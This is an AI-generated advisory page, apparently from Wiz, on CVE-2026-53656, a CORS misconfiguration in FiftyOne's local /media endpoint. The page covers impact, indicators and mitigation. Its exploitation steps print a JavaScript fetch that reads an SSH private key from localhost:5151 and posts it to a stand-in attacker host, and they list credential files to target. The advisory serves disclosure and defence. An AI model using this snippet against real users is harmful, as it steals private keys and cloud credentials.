CVE-2026-53656
Python Analisi e mitigazione delle vulnerabilità

Panoramica

CVE-2026-53656 is a permissive CORS misconfiguration vulnerability in the FiftyOne App/API server that enables drive-by data exfiltration from a user's local machine. Both fiftyone/server/app.py and the /media route (fiftyone/server/routes/media.py) unconditionally set Access-Control-Allow-Origin: *, allowing any website to make cross-origin requests to the locally running, unauthenticated FiftyOne server and read the responses. All versions of the fiftyone pip package prior to 1.17.0 are affected. The advisory was published on June 4, 2026, and added to the GitHub Advisory Database on July 15, 2026. It carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory, Voxel51 Advisory).

Dettagli tecnici

The root cause is an origin validation error (CWE-346) combined with a permissive cross-domain policy with untrusted domains (CWE-942): both app.py and media.py hard-coded Access-Control-Allow-Origin: * in their response headers, bypassing the browser's same-origin policy for all cross-origin requestors. The unauthenticated /media endpoint accepts a filepath query parameter and serves arbitrary files from the local filesystem, so a malicious page can issue a fetch to http://localhost:5151/media?filepath=/etc/passwd (or any other path) and read the full response. No authentication, credentials, or prior access to the victim's machine are required — the only precondition is that the victim has a FiftyOne server running locally (default port 5151) and visits an attacker-controlled web page. Browsers implementing Private Network Access (e.g., Chromium 142+) partially mitigate the attack, but Safari and Firefox do not yet enforce these protections (GitHub Advisory, Voxel51 Advisory).

Impatto

Successful exploitation results in high confidentiality impact with no integrity or availability impact. An attacker who lures a victim to a malicious web page can silently exfiltrate arbitrary local files readable by the FiftyOne server process — including SSH private keys, cloud provider credentials, .env files, and dataset media — to an attacker-controlled endpoint. Because the /media endpoint accepts arbitrary filesystem paths, the scope of data exposure extends beyond FiftyOne datasets to any file accessible to the server process user account. Media stored in cloud buckets served via signed URLs on a separate origin is not affected (GitHub Advisory).

Passaggi di sfruttamento

  1. Reconnaissance: Identify potential victims who use FiftyOne locally (e.g., data scientists, ML engineers). The FiftyOne server listens on localhost:5151 by default.
  2. Craft malicious page: Create a web page containing JavaScript that issues a cross-origin fetch to the FiftyOne server, e.g.:
fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa')
  .then(r => r.text())
  .then(data => fetch('https://attacker.example.com/exfil', {method:'POST', body: data}));
  1. Lure the victim: Deliver the malicious page via phishing email, malicious ad, or compromised website. The victim must have a FiftyOne server running locally and be using a browser without Private Network Access enforcement (e.g., Safari or Firefox).
  2. Automatic execution: When the victim's browser loads the page, the fetch executes silently. Because the FiftyOne server responds with Access-Control-Allow-Origin: *, the browser permits the cross-origin read.
  3. Exfiltrate data: The response body (file contents) is forwarded to the attacker's server. The attacker can iterate over known sensitive paths (/etc/passwd, ~/.aws/credentials, ~/.env, SSH keys, etc.) to maximize data collection (GitHub Advisory, Voxel51 Advisory).

Indicatori di compromesso

  • Network: Outbound HTTP POST or GET requests from the victim's machine to unknown external endpoints shortly after the FiftyOne server receives unusual /media requests; unexpected cross-origin requests to localhost:5151 visible in browser developer tools or local proxy logs.
  • Logs: FiftyOne server access logs showing repeated GET /media?filepath= requests with sensitive filesystem paths (e.g., /etc/passwd, /.ssh/id_rsa, /.aws/credentials, /.env) from 127.0.0.1 or ::1 with a browser User-Agent string (indicating browser-originated requests rather than direct API calls).
  • File System: No direct file system artifacts are created by exploitation, as the attack is read-only and in-memory within the browser context.
  • Process: No unusual child processes; exploitation occurs entirely within the FiftyOne server's normal request-handling flow (GitHub Advisory).

Mitigazione e soluzioni alternative

Upgrade to FiftyOne 1.17.0 or later, which removes the hard-coded Access-Control-Allow-Origin: * header and defaults to same-origin-only responses (FiftyOne Release). If cross-origin access is legitimately required, configure specific trusted origins via the new FIFTYONE_ALLOWED_ORIGINS environment variable (e.g., export FIFTYONE_ALLOWED_ORIGINS='https://trusted.example.com'); setting it to * restores the vulnerable behavior and emits a warning. For users unable to upgrade immediately: do not run the FiftyOne App server while browsing untrusted websites, keep the server bound to localhost (the default), and prefer browsers with Private Network Access enforcement such as Chromium 142+ (Voxel51 Advisory).

Reazioni della comunità

The advisory was published by Voxel51 maintainer benjaminpkane on June 4, 2026, with credited finders vittorio-prodomo and AAtomical, and remediation contributors mo-getter, kevin-dimichel, and AdonaiVera. No significant external media coverage or notable researcher commentary beyond the official advisory has been identified at this time (GitHub Advisory).

Risorse aggiuntive


FonteQuesto report è stato generato utilizzando l'intelligenza artificiale

Imparentato Python Vulnerabilità:

CVE ID

Severità

Punteggio

Tecnologie

Nome del componente

Exploit CISA KEV

Ha la correzione

Data di pubblicazione

GHSA-r3hx-x5rh-p9vvHIGH8.7
  • Python logoPython
  • django-haystack
NoJul 15, 2026
CVE-2026-54457HIGH7.7
  • Python logoPython
  • tensorzero
NoJul 15, 2026
CVE-2026-50271HIGH7.5
  • Python logoPython
  • ddtrace
NoJul 15, 2026
CVE-2026-54254MEDIUM6.9
  • Python logoPython
  • cyberdrop-dl-patched
NoJul 15, 2026
CVE-2026-53656MEDIUM6.3
  • Python logoPython
  • fiftyone
NoJul 15, 2026

Valutazione gratuita delle vulnerabilità

Benchmark della tua posizione di sicurezza del cloud

Valuta le tue pratiche di sicurezza cloud in 9 domini di sicurezza per confrontare il tuo livello di rischio e identificare le lacune nelle tue difese.

Richiedi valutazione

Richiedi una demo personalizzata

Pronti a vedere Wiz in azione?

"La migliore esperienza utente che abbia mai visto offre piena visibilità ai carichi di lavoro cloud."
David EstlickCISO (CISO)
"Wiz fornisce un unico pannello di controllo per vedere cosa sta succedendo nei nostri ambienti cloud."
Adam FletcherResponsabile della sicurezza
"Sappiamo che se Wiz identifica qualcosa come critico, in realtà lo è."
Greg PoniatowskiResponsabile della gestione delle minacce e delle vulnerabilità